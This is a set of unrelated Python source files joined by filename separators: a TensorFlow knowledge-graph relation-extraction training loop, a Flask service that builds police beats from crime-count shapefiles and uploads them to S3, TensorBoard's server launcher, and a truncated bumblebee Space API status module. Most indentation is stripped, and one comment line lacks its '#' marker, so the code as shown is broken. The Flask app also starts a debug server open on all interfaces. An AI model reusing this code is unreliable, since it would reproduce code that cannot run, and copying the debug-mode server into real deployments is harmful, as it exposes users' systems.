train_head = np.load(export_path + 'train_head0.npy')
train_tail = np.load(export_path + 'train_tail0.npy')
reltot = {}
for index, i in enumerate(train_label):
if not i in reltot:
reltot[i] = 1.0
else:
reltot[i] += 1.0
for i in reltot:
reltot[i] = 1/(reltot[i] ** (0.05))
print 'building network...'
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
model = network_pre.CNN(is_training = True, word_embeddings = word_vec)
global_step = tf.Variable(0,name='global_step',trainable=False)
global_step_kg = tf.Variable(0,name='global_step_kg',trainable=False)
tf.summary.scalar('learning_rate', FLAGS.learning_rate)
tf.summary.scalar('learning_rate_kg', FLAGS.learning_rate_kg)
optimizer = tf.train.GradientDescentOptimizer(FLAGS.learning_rate)
grads_and_vars = optimizer.compute_gradients(model.loss)
train_op = optimizer.apply_gradients(grads_and_vars, global_step = global_step)
optimizer_kg = tf.train.GradientDescentOptimizer(FLAGS.learning_rate_kg)
grads_and_vars_kg = optimizer_kg.compute_gradients(model.loss_kg)
train_op_kg = optimizer_kg.apply_gradients(grads_and_vars_kg, global_step = global_step_kg)
merged_summary = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(FLAGS.summary_dir, sess.graph)
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=None)
print 'building finished'
batch_size = int(KG.n_triplet / FLAGS.nbatch_kg)
def train_kg(coord):
def train_step_kg(pos_h_batch, pos_t_batch, pos_r_batch, neg_h_batch, neg_t_batch, neg_r_batch):
feed_dict = {
model.pos_h: pos_h_batch,
model.pos_t: pos_t_batch,
model.pos_r: pos_r_batch,
model.neg_h: neg_h_batch,
model.neg_t: neg_t_batch,
model.neg_r: neg_r_batch
}
_, step, loss = sess.run(
[train_op_kg, global_step_kg, model.loss_kg], feed_dict)
return loss
batch_size = int(KG.n_triplet / FLAGS.nbatch_kg)
times_kg = 0
while not coord.should_stop():
#while True:
times_kg += 1
res = 0.0
pos_batch_gen = KG.next_pos_batch(batch_size)
neg_batch_gen = KG.next_neg_batch(batch_size)
for batchi in range(int(FLAGS.nbatch_kg)):
pos_batch = next(pos_batch_gen)
neg_batch = next(neg_batch_gen)
ph = pos_batch[:, 0]
pt = pos_batch[:, 1]
pr = pos_batch[:, 2]
nh = neg_batch[:, 0]
nt = neg_batch[:, 1]
nr = neg_batch[:, 2]
res += train_step_kg(ph, pt, pr, nh, nt, nr)
time_str = datetime.datetime.now().isoformat()
print "batch %d time %s | loss : %f" % (times_kg, time_str, res)
def train_nn(coord):
def train_step(head, tail, word, pos1, pos2, mask, leng, label_index, label, scope, weights,
word_cr, pos1_cr, pos2_cr, scope_path, head_path, tail_path):
feed_dict = {
model.head_index: head,
model.tail_index: tail,
model.head_index_path: head_path,
model.tail_index_path: tail_path,
model.word: word,
model.pos1: pos1,
model.pos2: pos2,
model.word_cross: word_cr,
model.pos1_cross: pos1_cr,
model.pos2_cross: pos2_cr,
model.mask: mask,
model.len : leng,
model.label_index: label_index,
model.label: label,
model.scope: scope,
model.scope_path: scope_path,
model.keep_prob: FLAGS.keep_prob,
model.weights: weights
}
_, step, loss, summary, output, correct_predictions = sess.run([train_op, global_step, model.loss, merged_summary, model.output, model.correct_predictions], feed_dict)
summary_writer.add_summary(summary, step)
return output, loss, correct_predictions
stack_output = []
stack_label = []
stack_ce_loss = []
train_order = range(len(instance_triple))
save_epoch = 2
eval_step = 300
for one_epoch in range(FLAGS.max_epoch_pre):
print('pretrain epoch '+str(one_epoch+1)+' starts!')
np.random.shuffle(train_order)
s1 = 0.0
s2 = 0.0
tot1 = 0.0
tot2 = 1.0
losstot = 0.0
for i in range(int(len(train_order)/float(FLAGS.batch_size))):
input_scope = np.take(instance_scope, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path = np.take(instance_scope_path, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path3 = np.take(instance_scope_path3, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path4 = np.take(instance_scope_path4, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
index = []
scope = [0]
index_path = []
index_path3 = []
index_path4 = []
scope_path = [0]
scope_path3 = [0]
scope_path4 = [0]
label = []
weights = []
train_head_path = []
train_tail_path = []
train_head_path3 = []
train_tail_path3 = []
train_head_path4 = []
train_tail_path4 = []
for num, num_path, num_path3, num_path4 in zip(input_scope, input_scope_path, input_scope_path3, input_scope_path4):
index = index + range(num[0], num[1] + 1)
label.append(train_label[num[0]])
scope.append(scope[len(scope)-1] + num[1] - num[0] + 1)
weights.append(reltot[train_label[num[0]]])
index_path = index_path + range(num_path[0], num_path[1] + 1)
scope_path.append(scope_path[len(scope_path)-1] + num_path[1] - num_path[0] + 1)
index_path3 = index_path3 + range(num_path3[0], num_path3[1] + 1)
scope_path3.append(scope_path3[len(scope_path3)-1] + num_path3[1] - num_path3[0] + 1)
index_path4 = index_path4 + range(num_path4[0], num_path4[1] + 1)
scope_path4.append(scope_path4[len(scope_path4)-1] + num_path4[1] - num_path4[0] + 1)
train_head_path += [train_head[num[0]]]*len(range(num_path[0], num_path[1] + 1))
train_tail_path += [train_tail[num[0]]]*len(range(num_path[0], num_path[1] + 1))
train_head_path3 += [train_head[num[0]]]*len(range(num_path3[0], num_path3[1] + 1))
train_tail_path3 += [train_tail[num[0]]]*len(range(num_path3[0], num_path3[1] + 1))
train_head_path4 += [train_head[num[0]]]*len(range(num_path4[0], num_path4[1] + 1))
train_tail_path4 += [train_tail[num[0]]]*len(range(num_path4[0], num_path4[1] + 1))
label_ = np.zeros((FLAGS.batch_size, FLAGS.num_classes))
label_[np.arange(FLAGS.batch_size), label] = 1
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross3[index_path3,:], train_pos1_cross3[index_path3,:], train_pos2_cross3[index_path3,:],
np.array(scope_path3), train_head_path3, train_tail_path3)
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross4[index_path4,:], train_pos1_cross4[index_path4,:], train_pos2_cross4[index_path4,:],
np.array(scope_path4), train_head_path4, train_tail_path4)
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross[index_path,:], train_pos1_cross[index_path,:], train_pos2_cross[index_path,:],
np.array(scope_path), train_head_path, train_tail_path)
num = 0
s = 0
losstot += loss
for num in correct_predictions:
if label[s] == 0:
tot1 += 1.0
if num:
s1+= 1.0
else:
tot2 += 1.0
if num:
s2 += 1.0
s = s + 1
time_str = datetime.datetime.now().isoformat()
print "pretrain epoch %d step %d time %s | loss : %f, not NA accuracy: %f" % (one_epoch, i, time_str, loss, s2 / tot2)
current_step = tf.train.global_step(sess, global_step)
if (one_epoch + 1) % save_epoch == 0 and (one_epoch + 1) >= FLAGS.max_epoch_pre:
print 'epoch '+str(one_epoch+1)+' has finished'
print 'saving model...'
path = saver.save(sess,FLAGS.model_dir+'pretrain_'+str(FLAGS.max_epoch_pre))
				print 'have saved model to '+path
coord.request_stop()
coord = tf.train.Coordinator()
threads = []
threads.append(threading.Thread(target=train_kg, args=(coord,)))
threads.append(threading.Thread(target=train_nn, args=(coord,)))
for t in threads: t.start()
coord.join(threads)
if __name__ == "__main__":
tf.app.run()
|
app.py
|
import threading
from zipfile import ZipFile
from flask import Flask, request
import uuid
import sys
import subprocess
import settings as s
import utils as u
import boto3
import os.path
logger = u.init_logger(__name__)
app = Flask(__name__)
@app.route('/', methods=['POST'])
def index():
file_name = None
script_params = {}
try:
request_params = dict(request.form)
logger.info(f'Request params received from web server: {request_params}')
script_params = get_beat_generator_params(request_params)
logger.info(f'Script params: {script_params}')
params_as_script_argument = "<param>".join([f"{k}<=>{v}" for k, v in script_params.items()])
logger.info(f'Script params in concatenated format: {params_as_script_argument}')
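        # The concatenated string looks like (illustrative values only):
        #   "beat_name<=>ab12cd_beat<param>input_shapefile_path<=>data/input/xyz.shp"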
proc = subprocess.run([sys.executable, 'beat_generator.py', params_as_script_argument])
logger.info(f'Subprocess return code: {proc.returncode}')
response_txt = None
if proc.returncode == 0:
logger.info('Script executed successfully. Creating zip file')
zip_path, file_name = create_output_zip_file(script_params[s.beat_name])
logger.info(f'Uploading zip file to S3: {file_name}')
upload_file_to_s3(zip_path, file_name)
response_txt = file_name
else:
logger.error(f"Beat generation script exited with non-zero status: {proc.returncode}")
return f"App server has encountered an unexpected condition", 500
if not response_txt:
logger.error(f"Couldn't create zip file: {file_name}")
return f"There was an issue processing your request", 400
return response_txt, 200
finally:
if s.input_shapefile_path in script_params:
pwcc_file_name = script_params[s.input_shapefile_path].split('.')[0]
logger.info(f'pwcc file path to be deleted: {pwcc_file_name}')
t1 = threading.Thread(target=u.delete_file, args=(pwcc_file_name,))
t1.start()
if file_name:
output_file_name = f"{s.output_path}/{file_name.split('.')[0]}"
logger.info(f'Output file path to be deleted: {output_file_name}')
t2 = threading.Thread(target=u.delete_file, args=(output_file_name,))
t2.start()
def get_beat_generator_params(request_params):
params = {}
# Unique Beat name
beat_name = ''.join([str(uuid.uuid4().hex[:6]), '_beat'])
params[s.beat_name] = beat_name
# Polygon-wise crime count shapefile location
pwcc_shapefile_name = request_params['polygon_wise_count_shapefile']
u.download_file_from_s3(s.output_s3_bucket_name, pwcc_shapefile_name)
pwcc_shapefile_prefix = pwcc_shapefile_name.split('.')[0]
params[s.input_shapefile_path] = f'data/input/{pwcc_shapefile_prefix}.shp'
# Build balanced zones params
params[s.zone_creation_method] = request_params[s.beat_creation_method]
if params[s.zone_creation_method] == 'ATTRIBUTE_TARGET':
params[s.zone_building_criteria_target] = f"count {request_params.get('cfs_per_beat', 10000)} 1"
elif params[s.zone_creation_method] == 'NUMBER_ZONES_AND_ATTRIBUTE':
params[s.number_of_zones] = request_params[s.number_of_beats]
params[s.zone_building_criteria] = "count 1"
return params
def create_output_zip_file(beat_name):
with ZipFile(f'{s.output_path}/{beat_name}.zip', 'w') as zip_obj:
for ext in s.shapefile_components:
file_path = f'{s.output_path}/{beat_name}{ext}'
if os.path.exists(file_path):
logger.info(file_path + " : EXISTS")
zip_obj.write(f'{s.output_path}/{beat_name}{ext}', f'{beat_name}{ext}')
else:
logger.info(file_path + " : DOESN'T EXIST")
return f'{s.output_path}/{beat_name}.zip', f'{beat_name}.zip'
def upload_file_to_s3(filepath, object_name):
s3_resource = boto3.resource('s3')
s3_resource.Bucket(s.output_s3_bucket_name).upload_file(filepath, f'{s.s3_beats_dir_name}/{object_name}')
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
|
program.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for TensorBoard command line program.
This is a lightweight module for bringing up a TensorBoard HTTP server
or emulating the `tensorboard` shell command.
Those wishing to create custom builds of TensorBoard can use this module
by swapping out `tensorboard.main` with the custom definition that
modifies the set of plugins and static assets.
This module does not depend on first-party plugins or the default web
server assets. Those are defined in `tensorboard.default`.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from abc import ABCMeta
from abc import abstractmethod
import argparse
import atexit
from collections import defaultdict
import errno
import inspect
import logging
import os
import signal
import socket
import sys
import threading
import time
import absl.logging
import six
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
from werkzeug import serving
from tensorboard import manager
from tensorboard import version
from tensorboard.backend import application
from tensorboard.backend.event_processing import event_file_inspector as efi
from tensorboard.plugins import base_plugin
from tensorboard.plugins.core import core_plugin
from tensorboard.util import tb_logging
try:
from absl import flags as absl_flags
from absl.flags import argparse_flags
except ImportError:
# Fall back to argparse with no absl flags integration.
absl_flags = None
argparse_flags = argparse
logger = tb_logging.get_logger()
def setup_environment():
"""Makes recommended modifications to the environment.
This functions changes global state in the Python process. Calling
this function is a good idea, but it can't appropriately be called
from library routines.
"""
absl.logging.set_verbosity(absl.logging.WARNING)
# The default is HTTP/1.0 for some strange reason. If we don't use
# HTTP/1.1 then a new TCP socket and Python thread is created for
# each HTTP request. The tradeoff is we must always specify the
# Content-Length header, or do chunked encoding for streaming.
serving.WSGIRequestHandler.protocol_version = 'HTTP/1.1'
def get_default_assets_zip_provider():
"""Opens stock TensorBoard web assets collection.
Returns:
Returns function that returns a newly opened file handle to zip file
containing static assets for stock TensorBoard, or None if webfiles.zip
could not be found. The value the callback returns must be closed. The
paths inside the zip file are considered absolute paths on the web server.
"""
path = os.path.join(os.path.dirname(inspect.getfile(sys._getframe(1))),
'webfiles.zip')
if not os.path.exists(path):
logger.warning('webfiles.zip static assets not found: %s', path)
return None
return lambda: open(path, 'rb')
class TensorBoard(object):
"""Class for running TensorBoard.
Fields:
plugin_loaders: Set from plugins passed to constructor.
assets_zip_provider: Set by constructor.
server_class: Set by constructor.
flags: An argparse.Namespace set by the configure() method.
cache_key: As `manager.cache_key`; set by the configure() method.
"""
def __init__(self,
plugins=None,
assets_zip_provider=None,
server_class=None):
"""Creates new instance.
Args:
plugins: A list of TensorBoard plugins to load, as TBLoader instances or
TBPlugin classes. If not specified, defaults to first-party plugins.
assets_zip_provider: Delegates to TBContext or uses default if None.
server_class: An optional factory for a `TensorBoardServer` to use
for serving the TensorBoard WSGI app. If provided, its callable
signature should match that of `TensorBoardServer.__init__`.
:type plugins: list[Union[base_plugin.TBLoader, Type[base_plugin.TBPlugin]]]
:type assets_zip_provider: () -> file
:type server_class: class
"""
if plugins is None:
from tensorboard import default
plugins = default.get_plugins()
if assets_zip_provider is None:
assets_zip_provider = get_default_assets_zip_provider()
if server_class is None:
server_class = create_port_scanning_werkzeug_server
def make_loader(plugin):
if isinstance(plugin, base_plugin.TBLoader):
return plugin
if issubclass(plugin, base_plugin.TBPlugin):
return base_plugin.BasicLoader(plugin)
raise ValueError("Not a TBLoader or TBPlugin subclass: %s" % plugin)
self.plugin_loaders = [make_loader(p) for p in plugins]
self.assets_zip_provider = assets_zip_provider
self.server_class = server_class
self.flags = None
def configure(self, argv=('',), **kwargs):
"""Configures TensorBoard behavior via flags.
This method will populate the "flags" property with an argparse.Namespace
representing flag values parsed from the provided argv list, overridden by
explicit flags from remaining keyword arguments.
Args:
argv: Can be set to CLI args equivalent to sys.argv; the first arg is
taken to be the name of the path being executed.
kwargs: Additional arguments will override what was parsed from
argv. They must be passed as Python data structures, e.g.
`foo=1` rather than `foo="1"`.
Returns:
Either argv[:1] if argv was non-empty, or [''] otherwise, as a mechanism
for absl.app.run() compatibility.
Raises:
ValueError: If flag values are invalid.
"""
parser = argparse_flags.ArgumentParser(
prog='tensorboard',
description=('TensorBoard is a suite of web applications for '
'inspecting and understanding your TensorFlow runs '
'and graphs. https://github.com/tensorflow/tensorboard '))
for loader in self.plugin_loaders:
loader.define_flags(parser)
arg0 = argv[0] if argv else ''
flags = parser.parse_args(argv[1:]) # Strip binary name from argv.
self.cache_key = manager.cache_key(
working_directory=os.getcwd(),
arguments=argv[1:],
configure_kwargs=kwargs,
)
if absl_flags and arg0:
# Only expose main module Abseil flags as TensorBoard native flags.
# This is the same logic Abseil's ArgumentParser uses for determining
# which Abseil flags to include in the short helpstring.
for flag in set(absl_flags.FLAGS.get_key_flags_for_module(arg0)):
if hasattr(flags, flag.name):
raise ValueError('Conflicting Abseil flag: %s' % flag.name)
setattr(flags, flag.name, flag.value)
for k, v in kwargs.items():
if not hasattr(flags, k):
raise ValueError('Unknown TensorBoard flag: %s' % k)
setattr(flags, k, v)
for loader in self.plugin_loaders:
loader.fix_flags(flags)
self.flags = flags
return [arg0]
def main(self, ignored_argv=('',)):
"""Blocking main function for TensorBoard.
This method is called by `tensorboard.main.run_main`, which is the
standard entrypoint for the tensorboard command line program. The
configure() method must be called first.
Args:
ignored_argv: Do not pass. Required for Abseil compatibility.
Returns:
Process exit code, i.e. 0 if successful or non-zero on failure. In
practice, an exception will most likely be raised instead of
returning non-zero.
:rtype: int
"""
self._install_signal_handler(signal.SIGTERM, "SIGTERM")
if self.flags.inspect:
logger.info('Not bringing up TensorBoard, but inspecting event files.')
event_file = os.path.expanduser(self.flags.event_file)
efi.inspect(self.flags.logdir, event_file, self.flags.tag)
return 0
if self.flags.version_tb:
print(version.VERSION)
return 0
try:
server = self._make_server()
sys.stderr.write('TensorBoard %s at %s (Press CTRL+C to quit)\n' %
(version.VERSION, server.get_url()))
sys.stderr.flush()
self._register_info(server)
server.serve_forever()
return 0
except TensorBoardServerException as e:
logger.error(e.msg)
sys.stderr.write('ERROR: %s\n' % e.msg)
sys.stderr.flush()
return -1
def launch(self):
"""Python API for launching TensorBoard.
This method is the same as main() except it launches TensorBoard in
a separate permanent thread. The configure() method must be called
first.
Returns:
The URL of the TensorBoard web server.
:rtype: str
"""
# Make it easy to run TensorBoard inside other programs, e.g. Colab.
server = self._make_server()
thread = threading.Thread(target=server.serve_forever, name='TensorBoard')
thread.daemon = True
thread.start()
return server.get_url()
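# Illustrative usage (a hedged sketch, not part of the original file): the
# configure() + launch() pair above can be driven programmatically; the
# '/tmp/runs' logdir is an assumed placeholder.
#
#     from tensorboard import program
#     tb = program.TensorBoard()
#     tb.configure(argv=[None, '--logdir', '/tmp/runs', '--port', '0'])
#     url = tb.launch()  # e.g. 'http://localhost:6006/'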
def _register_info(self, server):
"""Write a TensorBoardInfo file and arrange for its cleanup.
Args:
server: The result of `self._make_server()`.
"""
server_url = urllib.parse.urlparse(server.get_url())
info = manager.TensorBoardInfo(
version=version.VERSION,
start_time=int(time.time()),
port=server_url.port,
pid=os.getpid(),
path_prefix=self.flags.path_prefix,
logdir=self.flags.logdir,
db=self.flags.db,
cache_key=self.cache_key,
)
atexit.register(manager.remove_info_file)
manager.write_info_file(info)
def _install_signal_handler(self, signal_number, signal_name):
"""Set a signal handler to gracefully exit on the given signal.
When this process receives the given signal, it will run `atexit`
handlers and then exit with `0`.
Args:
signal_number: The numeric code for the signal to handle, like
`signal.SIGTERM`.
signal_name: The human-readable signal name.
"""
old_signal_handler = None # set below
def handler(handled_signal_number, frame):
# In case we catch this signal again while running atexit
# handlers, take the hint and actually die.
signal.signal(signal_number, signal.SIG_DFL)
sys.stderr.write("TensorBoard caught %s; exiting...\n" % signal_name)
# The main thread is the only non-daemon thread, so it suffices to
# exit hence.
if old_signal_handler not in (signal.SIG_IGN, signal.SIG_DFL):
old_signal_handler(handled_signal_number, frame)
sys.exit(0)
old_signal_handler = signal.signal(signal_number, handler)
def _make_server(self):
"""Constructs the TensorBoard WSGI app and instantiates the server."""
app = application.standard_tensorboard_wsgi(self.flags,
self.plugin_loaders,
self.assets_zip_provider)
return self.server_class(app, self.flags)
@six.add_metaclass(ABCMeta)
class TensorBoardServer(object):
"""Class for customizing TensorBoard WSGI app serving."""
@abstractmethod
def __init__(self, wsgi_app, flags):
"""Create a flag-configured HTTP server for TensorBoard's WSGI app.
Args:
wsgi_app: The TensorBoard WSGI application to create a server for.
flags: argparse.Namespace instance of TensorBoard flags.
"""
raise NotImplementedError()
@abstractmethod
def serve_forever(self):
"""Blocking call to start serving the TensorBoard server."""
raise NotImplementedError()
@abstractmethod
def get_url(self):
"""Returns a URL at which this server should be reachable."""
raise NotImplementedError()
class TensorBoardServerException(Exception):
"""Exception raised by TensorBoardServer for user-friendly errors.
Subclasses of TensorBoardServer can raise this exception in order to
generate a clean error message for the user rather than a stacktrace.
"""
def __init__(self, msg):
self.msg = msg
class TensorBoardPortInUseError(TensorBoardServerException):
"""Error raised when attempting to bind to a port that is in use.
This should be raised when it is expected that binding to another
similar port would succeed. It is used as a signal to indicate that
automatic port searching should continue rather than abort.
"""
pass
def with_port_scanning(cls):
"""Create a server factory that performs port scanning.
This function returns a callable whose signature matches the
specification of `TensorBoardServer.__init__`, using `cls` as an
underlying implementation. It passes through `flags` unchanged except
in the case that `flags.port is None`, in which case it repeatedly
instantiates the underlying server with new port suggestions.
Args:
cls: A valid implementation of `TensorBoardServer`. This class's
initializer should raise a `TensorBoardPortInUseError` upon
failing to bind to a port when it is expected that binding to
another nearby port might succeed.
The initializer for `cls` will only ever be invoked with `flags`
such that `flags.port is not None`.
Returns:
A function that implements the `__init__` contract of
`TensorBoardServer`.
"""
def init(wsgi_app, flags):
# base_port: what's the first port to which we should try to bind?
# should_scan: if that fails, shall we try additional ports?
# max_attempts: how many ports shall we try?
should_scan = flags.port is None
base_port = core_plugin.DEFAULT_PORT if flags.port is None else flags.port
max_attempts = 10 if should_scan else 1
if base_port > 0xFFFF:
raise TensorBoardServerException(
'TensorBoard cannot bind to port %d > %d' % (base_port, 0xFFFF)
)
base_port = min(base_port + max_attempts, 0x10000) - max_attempts
for port in xrange(base_port, base_port + max_attempts):
subflags = argparse.Namespace(**vars(flags))
subflags.port = port
try:
return cls(wsgi_app=wsgi_app, flags=subflags)
except TensorBoardPortInUseError:
if not should_scan:
raise
# All attempts failed to bind.
raise TensorBoardServerException(
'TensorBoard could not bind to any port around %s '
'(tried %d times)'
% (base_port, max_attempts))
return init
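# Hedged sketch (not part of the original file): how a hypothetical
# TensorBoardServer implementation would opt into the port scanning documented
# above. Only the shape of the contract is shown; `_ExampleServer` and its
# `_bind` helper do not exist in this codebase.
#
#     class _ExampleServer(TensorBoardServer):
#         def __init__(self, wsgi_app, flags):
#             try:
#                 self._bind(flags.port)  # hypothetical bind helper
#             except OSError:
#                 raise TensorBoardPortInUseError('port %d taken' % flags.port)
#         def serve_forever(self): ...
#         def get_url(self): ...
#
#     server_factory = with_port_scanning(_ExampleServer)
#     # pass server_factory as `server_class` when constructing TensorBoard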
class WerkzeugServer(serving.ThreadedWSGIServer, TensorBoardServer):
"""Implementation of TensorBoardServer using the Werkzeug dev server."""
# ThreadedWSGIServer handles this in werkzeug 0.12+ but we allow 0.11.x.
daemon_threads = True
def __init__(self, wsgi_app, flags):
self._flags = flags
host = flags.host
port = flags.port
# Without an explicit host, we default to serving on all interfaces,
# and will attempt to serve both IPv4 and IPv6 traffic through one
# socket.
self._auto_wildcard = not host
if self._auto_wildcard:
host = self._get_wildcard_address(port)
self._fix_werkzeug_logging()
try:
super(WerkzeugServer, self).__init__(host, port, wsgi_app)
except socket.error as e:
if hasattr(errno, 'EACCES') and e.errno == errno.EACCES:
raise TensorBoardServerException(
'TensorBoard must be run as superuser to bind to port %d' %
port)
elif hasattr(errno, 'EADDRINUSE') and e.errno == errno.EADDRINUSE:
if port == 0:
raise TensorBoardServerException(
'TensorBoard unable to find any open port')
else:
raise TensorBoardPortInUseError(
'TensorBoard could not bind to port %d, it was already in use' %
port)
elif hasattr(errno, 'EADDRNOTAVAIL') and e.errno == errno.EADDRNOTAVAIL:
raise TensorBoardServerException(
'TensorBoard could not bind to unavailable address %s' % host)
elif hasattr(errno, 'EAFNOSUPPORT') and e.errno == errno.EAFNOSUPPORT:
raise TensorBoardServerException(
'Tensorboard could not bind to unsupported address family %s' %
host)
# Raise the raw exception if it wasn't identifiable as a user error.
raise
def _get_wildcard_address(self, port):
"""Returns a wildcard address for the port in question.
This will attempt to follow the best practice of calling getaddrinfo() with
a null host and AI_PASSIVE to request a server-side socket wildcard address.
If that succeeds, this returns the first IPv6 address found, or if none,
then returns the first IPv4 address. If that fails, then this returns the
hardcoded address "::" if socket.has_ipv6 is True, else "0.0.0.0".
"""
fallback_address = '::' if socket.has_ipv6 else '0.0.0.0'
if hasattr(socket, 'AI_PASSIVE'):
try:
addrinfos = socket.getaddrinfo(None, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, socket.IPPROTO_TCP,
socket.AI_PASSIVE)
except socket.gaierror as e:
logger.warn('Failed to auto-detect wildcard address, assuming %s: %s',
fallback_address, str(e))
return fallback_address
addrs_by_family = defaultdict(list)
for family, _, _, _, sockaddr in addrinfos:
# Format of the "sockaddr" socket address varies by address family,
# but [0] is always the IP address portion.
addrs_by_family[family].append(sockaddr[0])
if hasattr(socket, 'AF_INET6') and addrs_by_family[socket.AF_INET6]:
return addrs_by_family[socket.AF_INET6][0]
if hasattr(socket, 'AF_INET') and addrs_by_family[socket.AF_INET]:
return addrs_by_family[socket.AF_INET][0]
logger.warn('Failed to auto-detect wildcard address, assuming %s',
fallback_address)
return fallback_address
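# Illustrative standalone call (a sketch, not part of the original file) of the
# getaddrinfo() lookup described in the docstring above; port 6006 is just an
# example value.
#
#     infos = socket.getaddrinfo(None, 6006, socket.AF_UNSPEC,
#                                socket.SOCK_STREAM, socket.IPPROTO_TCP,
#                                socket.AI_PASSIVE)
#     # Each entry is (family, type, proto, canonname, sockaddr); sockaddr[0]
#     # is the wildcard IP, e.g. '::' for AF_INET6 or '0.0.0.0' for AF_INET.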
def server_bind(self):
"""Override to enable IPV4 mapping for IPV6 sockets when desired.
The main use case for this is so that when no host is specified, TensorBoard
can listen on all interfaces for both IPv4 and IPv6 connections, rather than
having to choose v4 or v6 and hope the browser didn't choose the other one.
"""
socket_is_v6 = (
hasattr(socket, 'AF_INET6') and self.socket.family == socket.AF_INET6)
has_v6only_option = (
hasattr(socket, 'IPPROTO_IPV6') and hasattr(socket, 'IPV6_V6ONLY'))
if self._auto_wildcard and socket_is_v6 and has_v6only_option:
try:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except socket.error as e:
# Log a warning on failure to dual-bind, except for EAFNOSUPPORT
# since that's expected if IPv4 isn't supported at all (IPv6-only).
if hasattr(errno, 'EAFNOSUPPORT') and e.errno != errno.EAFNOSUPPORT:
logger.warn('Failed to dual-bind to IPv4 wildcard: %s', str(e))
super(WerkzeugServer, self).server_bind()
def handle_error(self, request, client_address):
"""Override to get rid of noisy EPIPE errors."""
del request # unused
# Kludge to override a SocketServer.py method so we can get rid of noisy
# EPIPE errors. They're kind of a red herring as far as errors go. For
# example, `curl -N http://localhost:6006/ | head` will cause an EPIPE.
exc_info = sys.exc_info()
e = exc_info[1]
if isinstance(e, IOError) and e.errno == errno.EPIPE:
logger.warn('EPIPE caused by %s in HTTP serving' % str(client_address))
else:
logger.error('HTTP serving error', exc_info=exc_info)
def get_url(self):
if self._auto_wildcard:
display_host = socket.gethostname()
else:
host = self._flags.host
display_host = (
'[%s]' % host if ':' in host and not host.startswith('[') else host)
return 'http://%s:%d%s/' % (display_host, self.server_port,
self._flags.path_prefix.rstrip('/'))
def _fix_werkzeug_logging(self):
"""Fix werkzeug logging setup so it inherits TensorBoard's log level.
This addresses a change in werkzeug 0.15.0+ [1] that causes it to set its own
log level to INFO regardless of the root logger configuration. We instead
want werkzeug to inherit TensorBoard's root logger log level (set via absl
to WARNING by default).
[1]: https://github.com/pallets/werkzeug/commit/4cf77d25858ff46ac7e9d64ade054bf05b41ce12
"""
# Log once at DEBUG to force werkzeug to initialize its singleton logger,
which sets the logger level to INFO if it is unset, and then access that
# object via logging.getLogger('werkzeug') to durably revert the level to
# unset (and thus make messages logged to it inherit the root logger level).
self.log('debug', 'Fixing werkzeug logger to inherit TensorBoard log level')
logging.getLogger('werkzeug').setLevel(logging.NOTSET)
create_port_scanning_werkzeug_server = with_port_scanning(WerkzeugServer)
|
spaceapi.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=C0111,R0903
"""Displays the state of a Space API endpoint
Space API is an API for hackspaces based on JSON. See spaceapi.io for
an example.
Requires the following libraries:
* requests
* regex
Parameters:
* spaceapi.url: String representation of the api endpoint
* spaceapi.format: Format string for the output
Format Strings:
* Format strings are indicated by double %%
* They represent a leaf in the JSON tree, layers separated by "."
* Boolean values can be overwritten by appending "%true%false"
in the format string
* Example: to reference "open" in "{"state":{"open": true}}"
you would write "%%state.open%%", if you also want
to say "Open/Closed" depending on the boolean you
would write "%%state.open%Open%Closed%%"
"""
import bumblebee.input
import bumblebee.output
import bumblebee.engine
import requests
import threading
import re
import json
def formatStringBuilder(s, json):
"""
Parses Format Strings
Parameter:
s -> format string
json -> the spaceapi response object
"""
identifiers = re.findall("%%.*?%%", s)
for i in identifiers:
ic = i[2:-2] # Discard %%
j = ic.split("%")
# Either both the true and false replacements are given, or neither is
if len(j) != 3 and len(j) != 1:
return "INVALID FORMAT STRING"
if len(j) == 1: # no overwrite
s = s.replace(i, json[j[0]])
elif json[j[0]]: # overwrite for True
s = s.replace(i, j[1])
else: # overwrite for False
s = s.replace(i, j[2])
return s
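# Illustrative example (not part of the original module): the parser above
# applied to an already-flattened Space API response (see the __flatten helper
# in Module below, which turns {"state": {"open": True}} into {"state.open": True}).
#
#     data = {"space": "Entropia", "state.open": True}
#     formatStringBuilder("%%space%%: %%state.open%Open%Closed%%", data)
#     # -> "Entropia: Open"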
class Module(bumblebee.engine.Module):
def __init__(self, engine, config):
super(Module, self).__init__(
engine, config, bumblebee.output.Widget(full_text=self.getState)
)
engine.input.register_callback(
self, button=bumblebee.input.LEFT_MOUSE, cmd=self.__forceReload
)
self._data = {}
self._error = None
self._threadingCount = 0
# The URL representing the api endpoint
self._url = self.parameter("url", default="http://club.entropia.de/spaceapi")
self._format = self.parameter(
"format", default=u" %%space%%: %%state.open%Open%Closed%%"
)
def state(self, widget):
try:
